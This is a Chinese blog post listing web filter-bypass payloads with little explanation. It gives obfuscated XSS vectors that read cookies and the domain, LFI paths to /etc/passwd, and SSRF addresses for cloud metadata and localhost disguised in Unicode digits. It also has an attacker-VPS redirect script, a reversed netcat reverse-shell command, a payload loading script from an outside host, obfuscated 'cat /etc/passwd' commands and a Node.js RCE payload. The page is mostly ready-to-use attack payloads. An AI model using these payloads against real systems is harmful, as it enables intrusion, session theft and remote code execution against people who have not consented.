xss and ssrf bypass 小tips

已于 2023-07-19 17:26:30 修改
阅读量1.3k 收藏 2
点赞数
分类专栏: # 挖掘技巧 # tips # xss 文章标签: web安全
于 2022-04-26 16:04:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/124430188
版权
挖掘技巧 同时被 3 个专栏收录
49 篇文章 15 订阅
订阅专栏
tips
28 篇文章 4 订阅
订阅专栏
xss
2 篇文章 0 订阅
订阅专栏 
      javascript:%ef%bb%bfalert(XSS)  xss
      %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F  xss
      %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd  lfi
      ../../etc/passwd  lfi
      <svG/x=">"/oNloaD=confirm()//  xss
      http://⑯⑨。②⑤④。⑯⑨。②⑤④/  ssrf
      http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/  ssrf
      http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/  ssrf
      http://②⑧⑤②⓪③⑨①⑥⑥:80/  ssrf
      http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/  ssrf
      http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥  ssrf
      alert?.(document?.cookie)  xss
      <x/ onpointerRawupdatE=+\u0061\u006cert&DiacriticalGrave;1&DiacriticalGrave;>Tocuch me!  xss
    <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">  xss
    <lol/onauxclick=[0].some(alert)>rightclickhere  xss
    \"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss  xss
    marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>  xss
    <svg onload='new Function`["__"].find(al\u0065rt)`'>  xss
    <svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">  xss
    <svg onload=&#97&#108&#101&#114&#116(1)>  xss
    <svg onload='new Function`["__"].find(al\u0065rt)`'>  xss
    $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)  rce
    <svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>  xss
      Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();  xss
    
<img src=x onerror="a='',b=!a+a,aa=!b+a,ab=a+{},ba=b[a++],bb=b[baa=a],bab=++baa+a,aaa=ab[baa+bab],b[aaa+=ab[a]+(b.aa+ab)[a]+aa[bab]+ba+bb+b[baa]+aaa+ba+ab[a]+bb][aaa](aa[a]+aa[baa]+b[bab]+bb+ba+'(a)')()"> xss
    <svg onload=alert("")>  xss
    <svg onload=alert%26%230000000040"")>  xss
    <svg onx=() onload=(confirm)(1)>  xss
    <input/%00/autofocus=""/%00/onfocus=.1|alert`XSS`>
    <object/data=javascript:alert()>  xss
    <a/href="javascript%0A%0D:alert()">  
    -(a=alert,b="__",[b].find(a))-'  xss
  <img/src/onerror=arguments[0].path.pop().['al'+'ert'](1)>
  file:///etc/x%252Fy/../passwd?/../passwd
<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
<img src="1" onerror=s=createElement('script');body.appendChild(s);s.src="https://14.rs">

javas&Tab;cript:alert(1)
<xssBypass/onpointermove=(confirm)(1)>MoveMouseHere
<svg><script xlink:href="{ASCII}data:,alert(1)"></script></svg>
<img src=l onerror="a:b:c:d:alert(1)">
<a/href="javascript%0A%0D:alert()">
<svg onload=alert%26%230000000040">
<svg onx=() onload=(confirm)(1)>
%3CsVG2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
<object/data=javascript:alert()>
<svg onload=alert(")>
<lol/onauxclick-[0].some(alert)>rightclickhere
<sVG/x=">"/oNloaD=confirm()//

/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>

<object//data=//14.rs>

css xss

"><style>

@keyframes

 x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>>



<b/style=position:fixed;top:0;left:0;font-size:200px>CSS<

alert绕过


(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[8680439..toString(30)](1)

ssrf重定向绕过

攻击者vps上:


<?php
 header('location: http://127.0.0.1');
?>

测试:


http://target.com/image?url=http://attaker/1.php
cat /etc/passwd

{\c''\a""t,/e''*?/?a?s??}

{\c''\a""\t,/\e''*?/\p*\d}

nodejs开发软件或者站点下rce
<img src="1" onerror="require('child_process').exec('calc.exe',null);">

yggcwhat
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3909
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
xss常见的bypass方案
03-06
常见的xss bypass方案~
分享关于ssrf的检测技巧
hhiollk的博客
03-27 1528
SSRF(Server Side Request Forgery),翻译过来就是服务器请求伪造,意味着攻击者可以伪造来自服务器端的请求,并获取攻击者需要获取的数据。SSRF 漏洞出现的场景1.能够对外发起网络请求的地方,就可能存在 SSRF 漏洞2.远程资源调用功能(调用url,加载图片、在线翻译等)3.文件上传功能,在上传点修改type=url,将type=file改为type=url,然后将上传内容改为url。
XSS攻击、BYPASS及防御
qq_45944626的博客
08-24 783
XSS攻击、BYPASS及防御攻击一、 反射型XSS二、 存储型XSS三、 DOM型XSSbypass漏洞修复 攻击 一、 反射型XSS 前端 -> 后端 -> 前端 在URL中+ 一般存在在id=xxx 将xxx替换为,观察页面是否弹出”1” 若成功弹出,则存在反射型xss注入漏洞 二、 存储型XSS 前端 -> 后端 -> 数据库 -> 前端 输入框中的内容会存储在数据库中,然后回显在网页上 一般存在在留言框和页面搜索框中 2. <script>aler
XSS————XSS绕过Bypass的各种各样姿势
热门推荐
Fly_鹏程万里
04-16 1万+
XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。以一个网上商城应用Magento中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode为例,部分代...
C# 实现 java URLEncoder.encode编码
别看,很懒,随心
09-08 2742
** 最近碰到一个很坑很难受的问题,公司对接一个java项目碰到C# url编码跟java url编码后不一样,导致最后加密结果不一样 ** C# 中文url编码后是小写的 java 中文url编码后是大写的,且会对非安全字符进行编码 不说了,直接上码: 这里得注意一下,有些地方个别情况特殊符号没进行编码的,还是得自己手动Replace一下对应编码 public static class Utils { private static string UrlEncode(this str
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
XSS_Bypass_Cookbook_ver_3.0.pdf
08-07
2 Bypass Chrome XSS Auditor 2.1 字符集问题产生的bypass 2.2 过滤关键字造成的bypass 2.3 协议理解产生的bypass 2.4 标签导致的绕过 2.5 上传swf导致flash-xss所产生的bypass 2.6 crlf产生的bypass 3 各类针对...
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全XSS过滤器。
8. xss bypass
HWHXY的博客
01-17 255
layout: post title: 8. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第8篇小文章,内容为某网站的xssbypassXSS特征 这个点是一处app发布,可以插入a标签和img标签,但是a标签只能插入链接,否则会出错。条件很苛刻。 这时就想到了再找一个反射,把反射链接插进去,就相当于a+反射=点击存储。思路正确!开始找反射,好不容易找到一个,但是waf极强, on属性基本被消灭,遗留下来.
XSS易容术---bypass之编码混淆篇+辅助脚本编写
chengman3837的博客
01-05 485
一、前言 本文原创作者:vk,本文属i春秋原创奖励计划,未经许可禁止转载! 很多人对于XSS的了解不深。 一提起来就是:“哦,弹窗的”、”哦,偷cookie的。” 骚年,你根本不知道什么是力量。虽然我也不知道,哈哈。 好了,不瞎扯了,进入今天的主题: XSS易容术---bypass之编码混淆 ...
xssbypass小记
weixin_30687051的博客
03-23 98
简单整理下bypass的一些点 标签外 如果是标签之外 又有htmlspecialchars函数的点 就别想了 在标签外同时能xss但是有长度限制 如果是储存型可以利用多个点 然后构造<script>标签 在中间利用/**/注释掉html代码 一点一点的组合payload 除此以外<svg/onload=alert(1)>应该是比较短的payload...
SSRF漏洞之常见Bypass
weixin_39664643的博客
02-22 2052
SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF Bypass利用原理与方式 SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求的内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤 一般的防御措施是对URL参数进行过滤,或者使得URL参数用户不可控,但当过滤方法不当时,就存在Bypass的不同方式 通过CTF
ByPass
AquariusYuxin的博客
11-15 6965
一、 什么是Bypass。 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypass出面...
XSS钓鱼和组合拳技巧
goddemon
09-11 526
一.xss钓鱼 ①保存账户密码的后端钓鱼网页 保存js&css到服务器,登录action改为接受密码的文件action="./pass.php" <?php //php $user=$\_POST\['username'\]; $pass=$\_POST\['password'\]; $file=fopen('pass.txt','a+'); fwrite($file,$user."|"."pass" . "\\n"); fclose($file); echo "&lt
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 329
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
XSS Bypass
Grey的博客
07-30 1171
1. XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用...
XSS bypass
Fly_鹏程万里
12-18 1016
前言 在开始之前,我们先说一说XSS漏洞挖掘思路流程: 思路流程: 1、查找输入点与输出点的位置:      输入点好找,一般都是URL当中的参数,或者表单内容项等,而输出点一般有以下常见的几种情形: 输出在标签之间,例如:&lt;script&gt;输出&lt;/script&gt; 输出在属性之中,例如:&lt;input value="输出" name="keyword"&gt; ...
以下php代码会造成 (2分) A SQL注入 B XSS C SSRF D CSRF
最新发布
06-08
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; $result = mysqli_query($conn, $sql); if(mysqli_num_rows($result) > 0){ echo "Login Success"; } else{ echo ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值